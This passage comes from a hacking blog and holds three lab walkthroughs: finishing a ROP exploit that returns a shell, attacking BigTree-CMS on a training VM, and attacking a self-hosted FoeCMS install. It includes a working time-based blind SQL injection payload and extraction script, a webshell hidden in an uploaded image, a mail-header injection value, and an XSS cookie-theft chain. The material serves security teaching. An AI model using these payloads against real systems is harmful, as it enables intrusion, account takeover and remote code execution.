You can break at the ret of the checkpass function and step through each instruction, here I will break at the function call and ensure that is working as expected:
So our function seemed to have worked perfectly! :-)
Control Statements
I thought of a few different ways that control statements might be possible but was unable to find any relevant gadgets that were capable of doing it.
Because of this I haven't actually implemented any control statements in the exploit but I will describe a few gadgets that might make it possible.
The main reason I wanted a control statement in the exploit was because quite often I need to move the return value of the function into edx but the gadget to do this requires 4 double words on the stack.
As edx wasn't being used throughout the function I would have liked to find a gadget like this:
If we made sure edx = 0 and esi contained the address of the following gadget:
Then we could move the return value of the function into edx within the function, shrinking the size of the payload a little more.
This allows us to run a different gadget depending on the value of a register (in this case edx).
We could also look for the inverse of this conditional jump, like this:
In this case we still have esi spare and we just have to make sure edx is zero if we don't want to take the jump.
Of course the gadget pointed to by esi/edx (or any unused register which a gadget could jump to) could be something similar to the following:
Now, instead of just running 1 gadget, we are able to change the control flow of the application in a much bigger way.
Of course these examples are just dealing with testing if a value is zero or not but there is no reason why we couldn't check for a number of different values with a gadget like the following:
We could place a number of these to test for a number of specific values or even a range using 2 gadgets similar to the following:
Obviously there are so many different combinations that could lead to different branches being taken depending on certain values, these values don't necessarily need to be values set by the programmer either.
Consider the following:
Or the following sequence:
Now we can test values in memory against specific values and make decisions based on that.
Another option would be to use conditional moves, like this:
The goal here isn't to give you all of the possibilities that might arise (I don't think that would even be possible, there are so many), but to show that using a bit of creativity and having the right gadgets you can create reasonably complex applications using ROP.
Obviously you are limited by the gadgets that are available to you though.
A Second Function
I decided to add a second function which would take 3 arguments, the same 2 as the first function but with the extra value inside edx, this would be a value to write to the address that is being calculated.
The resulting function was:
I decided that it would be best if this function could be run almost directly after the first function, so that in cases where we want to write the address of a string into a pointer to that string, the first function could be run to calculate the address of the string and then the second function could be run to write that value into the pointer.
This of course means that it would be best if the return value of the first function was put inside edx, so the first function needs to be edited.
Here is the new first function:
Now we could run the first function as normal, followed by a pop ebx and the relevant value, and immediately run the second function (whose address will already be in eax) to write the value we've just calculated.
Running The Second Function Directly
Obviously to write the nulls we want to just run the second function with 0 in edx.
To do this all we have to do is make sure eax contains the distance from ecx (the top of the first function) to the top of the second function, which is 108 bytes, before we add eax, ecx.
I will use a technique I've not used before to do this. First we have to run the vulnerable application:
Now, in another terminal (as root) we need to find out the pid of the application:
So our application has the pid 25675, we now need to look at the memory layout of it, this is so we know the memory address range that we need to search:
The top 2 memory segments are static, so we can use anything in these sections of memory, we will look for 108 here using gdb:
So we can get the required value into eax using the following:
But we still need 0 in edx. So far we've only used 1 method to do this (xor eax, eax and then moving eax to edx) but we are no longer able to use eax so we are going to have to use a different method, here is 1:
Here we are just setting edx to 0xffffffff, which is the maximum value that edx can contain, and then increasing it by 1, which wraps edx around to 0 (inc sets the zero flag here; unlike add, it leaves the carry flag untouched).
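The wrap-around is plain 32-bit modular arithmetic, which a couple of lines of Python can confirm. `inc32` is just an illustrative helper, not part of the exploit.

```python
MASK = 0xFFFFFFFF

def inc32(value):
    """Model of x86 inc on a 32-bit register: add 1 and wrap at 2**32."""
    return (value + 1) & MASK

edx = 0xFFFFFFFF
edx = inc32(edx)
print(edx)  # 0
```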
Now we just need to call the function as normal:
So now in 12 double words, or 48 bytes, we have written zeros to a part of memory (the functions are contained in our padding section which is of fixed size anyway).
The Exploit So Far
If we put everything we've worked out so far together, we get to a point where we've written all of the zeros (or null terminators).
Our notes should now look similar to this:
Now we have to write the pointer values, we can do this by first running the first function to figure out the address of the string, then running the second function to write that value to the correct place.
Let me demonstrate how to do this with the pointer to the first string (which currently contains 0xbbbbbbbb).
First we find the address of the string:
Now we should have the address of the ////bin/bash string in edx.
Now we can write it to the correct location:
Done :-)
So in 8 double words, or 32 bytes, we've calculated the address of the string, and address of the pointer and written the address of the string over the pointer.
Finalizing The Exploit
We will actually set this pointer last out of the 3 pointers because we will need to set edx and ecx afterwards.
Remember edx needs to point to nulls and ecx needs to point to the beginning of the pointers (the address we wrote to here, which will be contained in edi after running the second function).
But to set ecx the address needs to contain nulls so after running the previous sequence, we can set both ecx and edx to the correct values using these gadgets:
Now the value we want in ebx is at the address pointed to by ecx so the following will give us the right value inside ebx:
Lastly we set eax and initiate the syscall:
Some of you may have noticed the mistake but after building the exploit and running it you will see this fails with a segfault and we get no shell.
Fixing The Exploit
I left this in here because it demonstrates nicely the types of problems you are likely to run into when developing these exploits.
The problem was in the functions. With our previous exploit the gadgets were all run in sequence so it didn't matter if we overwrote a previous gadget on the stack as we weren't going to use it again.
With the functions, though, we are going to run them numerous times so we must ensure that nothing that is vital for the application is overwritten.
The offending gadget (present in both functions) is:
The problem here is that the first push eax will actually overwrite the gadget itself on the stack.
Let's visualize this a little, just before the above gadget is run, the top of the stack looks like this:
When the gadget is first run, esp changes value by 4 bytes, like this:
Now the push eax instruction is executed which causes this to happen:
Obviously this is undesirable because when we go to run the function again, instead of running the actual gadget it will try to change execution to the value that was put here in the gadget's place.
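The same sequence can be traced in a tiny Python model. The gadget addresses and the value of eax are hypothetical, and each list element stands for one 4 byte stack slot.

```python
# Each list slot stands for one 4-byte stack slot; addresses are hypothetical.
stack = [0x08041111, 0x08042222, 0x08043333]
OFFENDING = 1      # index of the slot holding the offending gadget's address
eax = 0xDEADBEEF   # whatever eax happens to hold when the gadget runs

esp = OFFENDING
eip = stack[esp]   # ret: pop the gadget address into eip ...
esp += 1           # ... which moves esp up by one slot (4 bytes)

esp -= 1           # push eax: esp moves back down one slot ...
stack[esp] = eax   # ... and eax lands on top of the gadget's own address

print(hex(stack[OFFENDING]))  # 0xdeadbeef
```

The next time the function runs, the slot that should hold the gadget address holds the old value of eax instead, which is where the segfault comes from.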
The only way to deal with this is by removing this gadget and replacing it with something that doesn't edit any important parts of the stack.
One way I am going to solve this is by returning to the main application and moving the value into ebx there, this will however increase the size of the payload.
The second function is easiest to change:
On line 7 execution is moved back to the main application, there we must move the value, which will be in the edi register, into ebx.
The first function is a bit more difficult because there are 2 instances of the offending gadget.
The first we can deal with the same as in the second function but the second instance is different.
The goal of the end of this function is to move the return value into edx so that the second function can be run directly after.
What we can do is move the value into edi and then xchg edx and edi using the following 2 gadgets:
There is 1 problem here, the inc instruction after the xchg.
We need to make sure that this (ebx + 0x5e5b04c4) adds up to a memory address that is writable.
I looked at the application memory map over a few runs of the application:
There are 2 sections of writable memory that appear to be static (080cc000-080cd000 and 080ca000-080cc000).
As you can see though, these address ranges have low memory addresses, much smaller than the value added to ebx (0x5e5b04c4).
I decided I wanted to use the memory address of 0x080cc004, so I did the sum 0x1080cc004 - 0x5e5b04c4 = 0xa9b1bb40 (the leading 1 accounts for the 32 bit addition wrapping around).
So if we get the value 0xa9b1bb40 into ebx before we run the gadget in question it should work all of the time.
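A quick Python check of that sum, and of the fact that the addition inside the gadget lands back on the chosen address once it wraps at 32 bits. The constant names are mine; the values are the ones from the text.

```python
ADDEND = 0x5E5B04C4  # displacement added to ebx by the inc instruction
TARGET = 0x080CC004  # writable address chosen above

ebx = (TARGET - ADDEND) & 0xFFFFFFFF
print(hex(ebx))  # 0xa9b1bb40

# The gadget computes ebx + ADDEND; in 32 bits this wraps back to TARGET.
landed = (ebx + ADDEND) & 0xFFFFFFFF
print(hex(landed))  # 0x80cc004
```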
With all of this in mind our new function 1 looks like this:
Obviously this is smaller than the original function 1 meaning that the distance between function 1 and 2 will be smaller, in fact it is only 76 (or 0x4c) bytes now instead of 108.
Using the same method as before (attaching to the app using gdb and running find 0x08048000, 0x080ca000, 0x0000004c) I found that this value is found at the address 0x804ba61.
So we have to go about replacing the old address with this one wherever we have called function 2 directly.
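For anyone curious what that search boils down to, here is a sketch of the same idea in Python: scan a block of bytes for a little-endian 32 bit value at any alignment. The `dump` bytes are invented for the example and do not come from the real process, and `find_dword` is an illustrative helper rather than anything gdb exposes.

```python
import struct

def find_dword(mem, base, value):
    """Yield every address in `mem` (mapped at `base`) where the
    little-endian 32-bit `value` occurs, at any byte alignment."""
    needle = struct.pack("<I", value)
    pos = mem.find(needle)
    while pos != -1:
        yield base + pos
        pos = mem.find(needle, pos + 1)

# Hypothetical 16-byte dump standing in for real process memory.
dump = b"\x90\x4c\x00\x00\x00\xc3\x4c\x00\x00\x00\x01\x02\x03\x04\x05\x06"
hits = [hex(addr) for addr in find_dword(dump, 0x08048000, 0x4C)]
print(hits)  # ['0x8048001', '0x8048006']
```

Matches do not have to be aligned, which is why an odd address such as 0x804ba61 is a perfectly good result.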
All of this increased the size of the payload from 1008 to 1188 bytes but that's still a lot smaller than the 1536 bytes of the previous exploit.
Exploiting The Application
So now we have all the required information to make a working exploit.
You can see my full notes here.
And the full exploit here.
As normal we run the vulnerable application:
Start listening with nc:
Launch the exploit:
Then if you look at the terminal window running nc:
PWNED!! :-D
Conclusion
I know we didn't save a huge amount of space with this exploit (only 348 bytes), but that might be enough to get under a space restriction.
Also if we had more/different gadgets, which is certainly possible with a different application, we might have been capable of saving a lot more space.
The main point of this post was to demonstrate some reasonably advanced ROP techniques and suggest possibilities for improving an exploit where ROP is required.
Happy Hacking :-)
A Web Hack
So the other day I ran across this.
It's a VirtualBox VM containing a load of web applications vulnerable to SQL injection put together by Pentester Academy.
I've been a member of Pentester Academy from the very start (as well as having done a few of Securitytube's earlier courses), which I highly recommend, but I've never seen this VM.
In fact there are 2 VMs on this account that I've never seen before. I've seen both the arbitrary file upload VM and the command injection VM (I did a post about 1 of its applications here) but I'd never seen the SQL injection and XSS/CSRF VMs before.
So I decided to give it a go.
I've done a few of the challenges and they have been very fun so far but there is 1 I'd like to share.
With these challenges I'm trying to approach them from a web analysis point of view, so I'm looking for many different vulnerabilities and not just SQL injection.
Also I'm not using any public information about the applications to attack them and I'm doing the attacks from a completely blind approach (with no access to the machine or source code at all).
The Vulnerable App
The application I will be demonstrating is Bigtree-CMS.
It's an old version of the application and I won't be downloading the source and looking at that, I will just be pretending that the source code is unavailable.
So if we download the VM, import it into VirtualBox, boot it up and visit:
http://[ip]/BigTree-CMS/
We are 302 redirected and see the following:
Most likely something has gone wrong here. It's worth noting that I always set up the web browser that I am using to analyse a website to go through burp suite, so let's look at burp to see what happened:
So as you can see the application is pointing to itself via localhost meaning it is using absolute links and not relative. This is probably because the application was set up using localhost as its name.
We'll have to use burp to rewrite all of the responses:
Now if we reload the page we get:
A Quick Analysis
So we have the application working normally, it's time to explore it.
There is only 1 thing we know for certain about this application, and that is that it is vulnerable to an SQL injection.
If you click on the Glossary link in the top right of the homepage, you get redirected to the following url:
http://[ip]/BigTree-CMS/site/index.php/glossary/acid/
This suggests that the site is using REST-style urls, which basically means the values from normal url query parameters are integrated into the url itself. So, in regards to a search function, instead of this url:
http://[website]/[path]?search=foobar
You would have:
http://[website]/[path]/search/foobar
What this means is that parts of the url can be treated as a parameter would be treated.
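To make that concrete, here is a minimal Python sketch of how a REST-style url can be split into the segments that act as parameters. The function name and the example IP address are made up for illustration, and this says nothing about how the application itself parses its urls:

```python
from urllib.parse import urlsplit, unquote


def path_parameters(url, script="index.php"):
    """Return the decoded path segments that follow the front controller script.

    For REST-style urls these segments play the role that query
    parameters play in a conventional url.
    """
    segments = [unquote(s) for s in urlsplit(url).path.split("/") if s]
    if script in segments:
        segments = segments[segments.index(script) + 1:]
    return segments


# 192.0.2.10 is a documentation address standing in for [ip]
print(path_parameters("http://192.0.2.10/BigTree-CMS/site/index.php/glossary/acid/"))
```

Each returned segment is a candidate injection point, in the same way that each query string parameter would be.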
Also, after putting in the following url:
http://[ip]/BigTree-CMS/site/index.php/admin/
We get redirected to the following page:
I tried looking for SQL injections into the login but it appeared to be reasonably secure.
Also there doesn't appear to be a signup link anywhere and going to:
http://[ip]/BigTree-CMS/site/index.php/admin/signup/
Redirects to the login page, and:
http://[ip]/BigTree-CMS/site/index.php/signup/
404's
An SQL Injection
I'm going to rush through this section because there is a lot of trial and error involved in determining the database and in building and refining the injection attack, but I go into that in much more detail in my SQL Injections post.
So my focus turned to the url parameters. I first tried:
http://[ip]/BigTree-CMS/site/index.php/glossary/acid%27/
But got redirected back to:
http://[ip]/BigTree-CMS/site/index.php/glossary/acid/
So I tried the quote next to glossary and this happened:
This is very helpful, it actually tells us the full query we are injecting into:
Unfortunately it doesn't allow us to retrieve arbitrary information to the screen (at least that I could find) or even tell us the number of columns that the original query returns.
Obviously we can figure out the number of columns is 3 using SQL's ORDER BY because the lowest number to fail is:
http://[ip]/BigTree-CMS/site/index.php/glossary%27%20order%20by%204%20--%20/acid/
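The ORDER BY probing can be sketched in Python as follows. This is only an illustration: the function names are my own, and the `fails` predicate is a hypothetical stand-in for "request this url and see whether the page errors":

```python
from urllib.parse import quote

# [ip] is a placeholder for the address of the lab VM
BASE = "http://[ip]/BigTree-CMS/site/index.php/glossary"


def order_by_url(n, base=BASE):
    """Build the url that injects ' order by n -- ' after the glossary segment."""
    return base + quote(f"' order by {n} -- ") + "/acid/"


def count_columns(fails, limit=50):
    """Return the column count, given a predicate telling us whether ORDER BY n fails."""
    for n in range(1, limit + 1):
        if fails(n):
            return n - 1  # the last n that still worked
    return None  # nothing failed up to the limit


print(order_by_url(4))
```

If ORDER BY 4 is the lowest number to fail, `count_columns` returns 3.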
The easiest method I found of exploiting this was a time-based approach. I assume you could use a content-based approach by way of a forced error, or by ensuring no records were returned (and getting a 404 back), but I'm not under a time constraint so I wasn't too bothered.
So I first wrote a script to give me the database name (or at least a database name) and 1 of its table names:
Believe it or not, this is how I write scripts: straight url encoded (mostly), and normally with the string on 1 line (I've put it on multiple lines here for readability).
For those of you not as used to url encoding and SQL, here is what I'm injecting:
' union select null,null,case when ascii(substr((select concat(table_schema,' : ',table_name) from information_schema.tables where table_schema!='information_schema' limit 1),[position],1))=[character ascii value] then sleep(3) else 1 end --
Then I'm checking to see if the response took longer than 3 seconds (we could increase this based on how long the website normally takes to respond).
I'm sending it through the proxy at 127.0.0.1:8080 (which is burp) so that burp can rewrite the relevant content and headers automatically. It shouldn't make a difference, but I thought it wouldn't hurt.
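For reference, a minimal Python 3 sketch of this approach might look like the following. It is an illustration under assumptions rather than the exact script: the function names, the DELAY constant and the character range are my own choices, [ip] is a placeholder, and the burp proxy is left out for brevity. It should only ever be pointed at a lab VM like this one:

```python
import time
import urllib.parse
import urllib.request

# Placeholder target; replace [ip] with the address of the lab VM.
BASE = "http://[ip]/BigTree-CMS/site/index.php/glossary"
DELAY = 3  # seconds the database sleeps when a guess is correct

SUBQUERY = ("select concat(table_schema,' : ',table_name) "
            "from information_schema.tables "
            "where table_schema!='information_schema' limit 1")


def build_payload(position, code, subquery=SUBQUERY, delay=DELAY):
    """SQL injected after 'glossary' to test one character of the result."""
    return ("' union select null,null,case when "
            f"ascii(substr(({subquery}),{position},1))={code} "
            f"then sleep({delay}) else 1 end -- ")


def timed_oracle(position, code):
    """True if the response was delayed, i.e. the guess was correct."""
    url = BASE + urllib.parse.quote(build_payload(position, code)) + "/acid/"
    start = time.monotonic()
    try:
        urllib.request.urlopen(url, timeout=DELAY * 5).read()
    except OSError:
        pass  # error pages and timeouts still tell us how long it took
    return time.monotonic() - start >= DELAY


def extract(oracle, max_len=64, charset=range(32, 127)):
    """Recover a string one character at a time using a yes/no oracle."""
    result = ""
    for position in range(1, max_len + 1):
        for code in charset:
            if oracle(position, code):
                result += chr(code)
                break
        else:
            break  # no printable character matched: end of the string
    return result


# Against the lab VM this would be run as:
#     print(extract(timed_oracle))
```

Keeping the oracle separate from the extraction loop means the same loop can be reused with a different subquery, or with a content-based check instead of a timing check.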
When run we get this:
So we now have the database name and a table name from it, this is likely not the table we are really interested in though so another script is required to find out the rest of the table names:
This is almost the same as the last script except I'm using GROUP_CONCAT to concatenate all the records and I'm excluding the bigtree_404s table.
Running it you get:
Obviously the table of most interest to us here is bigtree_users, now we need to figure out the column names:
Again this is very similar to the last 2 scripts, except now we are looking at the columns table of the information_schema database.
Running this you get:
Now we have enough information to get the account details, I've chosen a few interesting columns to print:
Running this we get:
Cracking The Hash
So we have the details for 1 user account (the admin account in this case), now we should try to crack it.
For this I'll use john the ripper.
Let's try just a normal brute force for a while and if that takes too long we'll try a dictionary attack or something:
Luckily this was a very insecure password and the hash was cracked very quickly using a brute force (this is another security issue, allowing weak passwords).
Some More Poking About
After logging in as the [email protected] user, you should see this:
Clicking around there are a number of interesting things, like a stored XSS in the footer social links, so by creating a footer link like this:
And while it doesn't run when viewed in the admin panel (bear in mind that the subtitle field is likely vulnerable too, which would make this less obvious):
When any normal page is visited, the attack is run:
And looking at this response in burp, we can see where our attack payload is put:
But, more interestingly, in Modules -> Features -> Add Feature I have the ability to upload pictures:
Unrestricted File Upload Vulnerability
So, first I just upload a normal image file.
For this I'm going to use this image (credits to Majonez who created it).
I just saved it with the filename one.jpg, select it in the form, put the title as one, click Save & Publish and I get this:
It's asking to crop the image, which probably means there is some sort of analysis done on the image.
Full Path Disclosure
At this point I decided to try to upload a plain PHP backdoor, so I clicked on the View Features button and was presented with this:
Obviously because I started uploading the image it created the feature, but as I didn't crop it, it hasn't finished creating the feature. This is a logic flaw in the application which may or may not lead to a security vulnerability.
Let's look at this feature:
So the logic flaw led to a full path disclosure vulnerability. Really the developers should have waited until all of the steps of creating the feature had completed before creating it, or discarded any half-created features after a timeout. This error should also be caught and dealt with gracefully.
Back To The File Upload
Anyway, we can continue by trying to upload the following PHP file:
This is just a very simple PHP backdoor which will take an input in the cmd argument of a query string of a GET request.
Trying to upload the file in the same manner as I did the image, I get:
The image size is 1 issue but it also says that it isn't an image file. This could just be a content type check or it could also check the file extension.
Hopefully we can beat both of these checks by using a real image but changing the file extension to .php.
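As I can't see the server-side code, the following is only a guess at what the two kinds of check could look like, sketched in Python rather than PHP. The function names, the allow-list and the magic byte table are all assumptions for illustration:

```python
import os

JPEG_MAGIC = b"\xff\xd8\xff"
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif"}


def looks_like_image(data):
    """Content check: does the file start with a known image signature?"""
    return data.startswith((JPEG_MAGIC, PNG_MAGIC, b"GIF87a", b"GIF89a"))


def has_allowed_extension(filename):
    """Extension check: is the file name on the allow-list?"""
    return os.path.splitext(filename)[1].lower() in ALLOWED_EXTENSIONS


jpeg_bytes = JPEG_MAGIC + b"\xe0" + b"\x00" * 16  # stand-in for a real JPEG
for name, data in [("one.jpg", jpeg_bytes),
                   ("two.php", jpeg_bytes),
                   ("backdoor.php", b"<?php /* ... */ ?>")]:
    print(name, looks_like_image(data), has_allowed_extension(name))
```

A real image renamed to .php passes the content check but not the extension check, so whether such a file is accepted tells us which of the 2 checks the application actually performs.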
Firstly I will change the size to 1400x625, which is the size it wanted to crop the image to. I did this in GIMP using Image -> Scale Image...:
I saved this to two.jpg, renamed it to two.php and attempted the upload again:
So it's uploaded successfully!
Right clicking on the new image and clicking Copy Image Location gives us the following url:
http://[ip]/BigTree-CMS/site/files/features/t_two.php
In that folder there are currently the following files:
Obviously, these will not work as PHP files yet because they contain no actual PHP code (we will sort that out in a minute), but we can see that both two.php and xlrg_two.php are very likely our original file, whereas t_two.php is a different version created by the application.
So I added some PHP code into the comments section of the image, using GIMP again, going to File -> Export..., putting three.jpg as the name and clicking Export:
Again, change the file extension from .jpg to .php and do the upload.
After, visit the following url to see if it has worked:
http://[ip]/BigTree-CMS/site/files/features/three.php?cmd=cat%20/etc/passwd
Obviously that didn't work :-(
After a lot of trial and error, I decided to try searching for other instances of <? (the opening of PHP code in PHP files) using the hex editor HxD:
There were 2 other instances (apart from the 1 in the comment section which contains my PHP code), here is the comment section in HxD:
I changed one of the values so that there were no other instances and tried again:
Clearly it didn't work, but at least now it's not producing an error (it's returning the actual content of the file instead of nothing, which means those 2 extra <? were a problem).
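The same search can be done without a hex editor. This is a small Python sketch (the function name and the sample bytes are made up) that lists every offset where <? appears in a blob of binary data:

```python
def find_all(data, needle=b"<?"):
    """Return every byte offset at which needle occurs in data."""
    offsets = []
    start = data.find(needle)
    while start != -1:
        offsets.append(start)
        start = data.find(needle, start + 1)
    return offsets


# Made-up bytes standing in for an image with a stray "<?" before the real code
sample = b"\xff\xd8\xff\xe0junk<?more\xff\xfe<?php echo 1; ?>"
print(find_all(sample))

# For a real file the data would come from something like:
#     data = open("three.php", "rb").read()
```

Any offset other than the one where the PHP code was deliberately placed is a stray <? that the PHP interpreter will try to parse.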
I thought that maybe the application was stripping the comment section, so I used HxD again to insert my PHP code directly into the middle of the actual image:
Trying this file, gives us:
I now have the ability to run OS commands on the webserver.
PWNED!!! :-D
Conclusion
I think this post illustrates the different steps that might be involved in a full attack against a web application.
As you can see, there could be many vulnerabilities involved (I found at least 6 vulnerabilities in this application), each getting you closer and closer to the ultimate goal of RCE (remote code execution).
There will always be a reasonable level of trial and error when figuring out how to exploit most vulnerabilities, in all but the simplest cases, so a lot of patience is required to be successful!
Happy Hacking :-)
Further Reading
The Web Application Hackers Handbook by Dafydd Stuttard and Marcus Pinto (Here is the website that accompanies the book)
OWASP Testing Guide which can be viewed online or downloaded from here.
SQL Injection Attacks and Defense by Justin Clarke
Pentester Academy by Vivek Ramachandran has a number of relevant courses (WAP, Challenges and Python)
Hacking FoeCMS
Today I decided to look at FoeCMS.
There are many known vulnerabilities for the older version of the application (version 1.6.5) but none that I could find for the current version (on Github).
I plan to develop a full attack against this application while looking for vulnerabilities.
Setting Up The App
I set up the application on Debian/Apache/PHP5/MySQL.
It's pretty easy to set up, just pull the code from github with:
git clone https://github.com/themarioga/FoeCMS.git
Place it in the webroot (or subfolder if you wish), set the permissions:
chown -R www-data:www-data /var/www
Then create the database and database user:
Now it's just a matter of finishing the installation through the browser, visiting the site we get directed to this:
These are the settings I'm using. Notice how only guests with invitations can register.
There is 1 thing left to do, remove or rename the install directory:
root@foecms:~# mv /var/www/install /var/www/install.old
Now that installation is finished when we visit the webpage we should be presented with this:
Some Vulnerabilities
Now we just need to use the application a bit and see what we can find.
Some SQL Injections
The first thing I did was change the language to English (by clicking the little union jack flag at the top of the page), which sends the following request:
http://foecms/index.php?i=2
Which sets the following cookie:
foecms_lang=2; expires=Mon, 09-Mar-2015 11:05:12 GMT
Here we already have 2 possible attack vectors (the value of the i parameter to index.php and the value of the foecms_lang cookie).
In fact both of these are vulnerable to SQL Injection, you can see this if you send this request:
http://foecms/index.php?i=2%27
Here is the full response:
And now if you visit any page, you get the same response body:
To get rid of this error we need to remove the %27 from the cookie, I prefer Cookie Manager+ for this purpose:
And delete the PHPSESSID cookie:
Continuing to play about with the application I come across another page with an SQL injection vulnerability:
And an XSS is also possible:
I won't explain how to exploit these SQL injection vulnerabilities anymore, I've already done that pretty extensively in previous posts.
A Mail Injection Vulnerability
So let's move on.
Clicking on Contact at the bottom of the site gives you this, rather poorly written, page:
After putting in some arbitrary information, I set Burp to intercept the request, capture it and insert the following into the email address field:
%0aBCC:[email protected]
Here I am trying to inject another email address to send the email to:
Note: for the web application to be able to send emails externally (on the setup I have running) you need to enable it by running the following command and choosing Internet Site:
root@foecms:~# dpkg-reconfigure exim4-config
Checking the mailbox on Mailinator's website, we can see the email has been received:
Unfortunately the subject didn't get sent correctly but with a bit of testing I'm sure this could be refined to a more convincing email, and then this could be used as an email proxy to send out spam/phishing email.
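To show why the %0a matters, here is a small Python sketch of the general problem. I haven't looked at how the application builds its email, so `naive_headers` is purely a hypothetical stand-in for any code that pastes user input straight into mail headers, and the addresses are made-up examples:

```python
from urllib.parse import unquote


def naive_headers(sender, subject):
    """Build headers the unsafe way: by pasting user input into a string."""
    return f"From: {sender}\nSubject: {subject}\n"


def is_safe_header_value(value):
    """Reject values that could start a new header line."""
    return "\r" not in value and "\n" not in value


# What the email field looks like after the server url decodes it
field = unquote("visitor@example.com%0aBCC:someone@example.org")

print(naive_headers(field, "Contact form"))
print(is_safe_header_value(field))
```

The decoded newline ends the From header early, so the BCC text lands on its own line and is treated as a separate header. Rejecting carriage returns and line feeds in any value that ends up in a header is enough to stop this particular trick.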
A Logic Flaw
When trying to register, by visiting:
http://foecms/register.php
We get redirected to the following error:
This is because I set registration to invite only during installation.
After some testing I decided to add the cookie foecms_userid:
I did this because of the foecms_lang cookie. I then clicked on the link to the test post, which sent this request:
http://foecms/viewitem.php?i=1
I got an error message saying No items found and then redirected to the homepage again, where I see this:
So it appears that I have been logged in.
We also now have the extra User Control Panel button, which gives us:
It looks like even though we're logged in, we're not logged in as anyone in particular, which means we have limited functionality.
For instance, we can't change any account details because our session doesn't appear to belong to an account.
Inviting Myself
I did, however, have access to the invitation page:
After sending an invitation we get this:
So it tells us the URL to visit. Here is the email that is received:
This email isn't really helpful but the application has already given us the registration URL.
The problem is when we visit it we get this:
Fixing The App
The problem we face here seems to be a problem in the application itself.
It doesn't seem to be prepending the prefix to the table name.
Obviously this would have been fixed on a production website so I just fixed this manually by editing /var/www/include/functions.php, line 336, and changing it from:
And replacing it with this:
So I'm just hardcoding the prefix into the query, not the best fix but it will work for our purposes.
Now when we visit the registration page we get:
Obviously, if we want to create an account we probably want to give it a less obvious name but we are only testing here.
Here is the welcome email you receive after registration:
The main thing we can get from this is that our email is sent in plain text and it's encrypted as MD5.
XSS Via SQL Injection
Actually, after this next vulnerability it might not have been necessary to create an account but the account will come in useful for testing it.
Now that we have an account we can try sending a message to it:
Logging into the new hacker account we can see we've received a new message:
But clicking on this message shows us this (after some form of redirect):
Looking at the code in Burp we can see why this redirect happened:
But the message was displayed:
Now I did try a number of things to perform an XSS attack but was unable to.
But if we try to send another message, this time with message' in the message box, we get the following error:
Clearly we have another SQL injection vulnerability but this time in an INSERT statement.
The error tells us that we are injecting right at the end of the statement, so what we'll do is close off the current row and insert a new row, we'll also need to comment out anything after our injection.
So our injection should look as follows:
message'),([our new record]); --
The problem we've got is we don't know the number of columns or their types used in the statement.
We could use 1 of the other SQL injections to query the information_schema to get that information but we can use a different method.
Because NULL can be typecast to any type in MySQL, we can just keep increasing the number of NULL's until we no longer get an error.
There will likely be at least 4 columns (from, to, title and message), so let's start there by sending:
message'),(null,null,null,null); --
We got another error!
Looking at the request in Burp we can see why:
It seems the browser has stripped the last space from the message. On other DBMSs that wouldn't be a problem but on MySQL it is (the -- comment marker must be followed by whitespace), so we will use Burp's Repeater to do this injection:
Now we can edit the request in a lot more detail and sending it is successful:
This means that there are only 4 fields (presumably from, to, title and message).
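The NULL-padding approach used above is easy to automate. As a rough sketch (the function name and defaults are my own), this Python generator produces the payload for each candidate column count, keeping the trailing space that MySQL needs after the comment marker:

```python
def null_padding_payloads(prefix="message", start=4, max_columns=8):
    """Yield (count, payload) pairs for increasing numbers of NULL columns."""
    for count in range(start, max_columns + 1):
        row = ",".join(["null"] * count)
        # The trailing space after "--" matters: MySQL needs it for a comment.
        yield count, f"{prefix}'),({row}); -- "


for count, payload in null_padding_payloads(max_columns=6):
    print(count, repr(payload))
```

Each payload would be sent in turn (through something like Burp's Repeater, so the trailing space survives) until one stops producing an SQL error.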
Obviously, this isn't helpful because we've not filled in any of the fields so the message will not actually go to anyone.
The problem is that we don't know the types of the fields (at least the from and to fields) or the positions of any of them other than the message field.
In this case a bit of trial and error is normally required but luckily the first thing I tried turned out to be fruitful:
Here I am just injecting (1,2,3,4) as our new record.
After logging into the hacker account and checking the messages, we have received a message from admin with the title 3:
As it's showing up as being from admin, it's likely that the first field is the from field and it's using the userid instead of the username.
Also, this means the hacker user likely has a userid of 2.
Clicking on the message, we get:
So it no longer redirects. What that probably means is that the redirect happens when the message is sent from a nonexistent account, but when it's sent from a valid userid the redirect doesn't happen.
So now we can test sending an XSS payload:
Viewing this message:
So some sanitization has been done.
We can use MySQL's CHAR and CONCAT functions to avoid using < or >.
We do this by putting the following in the message field:
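As an illustration of the idea (not the exact value used in the message field), this Python sketch turns a string into a MySQL CONCAT() expression in which the filtered characters only ever appear as CHAR() codes. The function names and the harmless bold tag are my own choices:

```python
def mysql_char(text):
    """Encode text as a MySQL CHAR() call, e.g. '<' becomes CHAR(60)."""
    return "CHAR(" + ",".join(str(ord(c)) for c in text) + ")"


def concat_avoiding(text, banned="<>&"):
    """Build a CONCAT() expression where banned characters appear only as CHAR() codes."""
    parts, literal = [], ""
    for ch in text:
        if ch in banned:
            if literal:
                parts.append("'" + literal + "'")
                literal = ""
            parts.append(mysql_char(ch))
        else:
            # Double any single quote so the SQL string literal stays valid
            literal += "''" if ch == "'" else ch
    if literal:
        parts.append("'" + literal + "'")
    return "CONCAT(" + ",".join(parts) + ")"


print(concat_avoiding("<b>bold</b>"))
```

Because the database evaluates the expression after the application has done its filtering, the stored value contains the real < and > characters even though they never appeared in the request.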
And viewing this message:
Success!
Now we just have to craft a payload that we can use to steal the admin user's session cookies (as the cookies aren't protected with the httponly flag, it's possible to do this using javascript).
One way of doing that is the following:
Here I'm just sending a message to the account I created with the cookies as the message.
I could have just sent the cookie in an HTTP request to any server on the internet and got the cookie that way but I thought this would be fun :-)
Viewing this with firebug we can see that the request was made:
However, as you can see here (from the response in firebug) the request failed:
This was only because the application doesn't allow sending messages to yourself; when we attack the admin account it will be sending the message to the hacker account.
I think it's time to test the attack on the admin:
Notice above that I substituted every instance of & with char(38); this was because the application was converting & to &amp;, which broke the attack.
Now logging in as admin (with firebug running so we can see the request):
Now if we check the hacker user's messages (obviously from a different browser so we don't expire the admin's session):
Finding RCE
We can now hijack the admin's session, there are a number of ways to do this, all we need to do is add the PHPSESSID cookie to our browser.
This time I'm going to do that by setting Burp as the proxy and intercepting the response from the server to add a Set-Cookie header:
Now if we reload the homepage we are logged into the admin account.
An Unrestricted File Upload Vulnerability
There is now another button at the top of the site, Admin's Panel. Looking through that a bit gives us a good option for a file upload vulnerability:
This seemed to work fine, we just need to figure out where it uploaded to.
Visiting the homepage showed a new section with a broken image (presumably the image that I didn't upload when uploading my backdoor):
Right clicking and copying the link to that broken image gave me the following link:
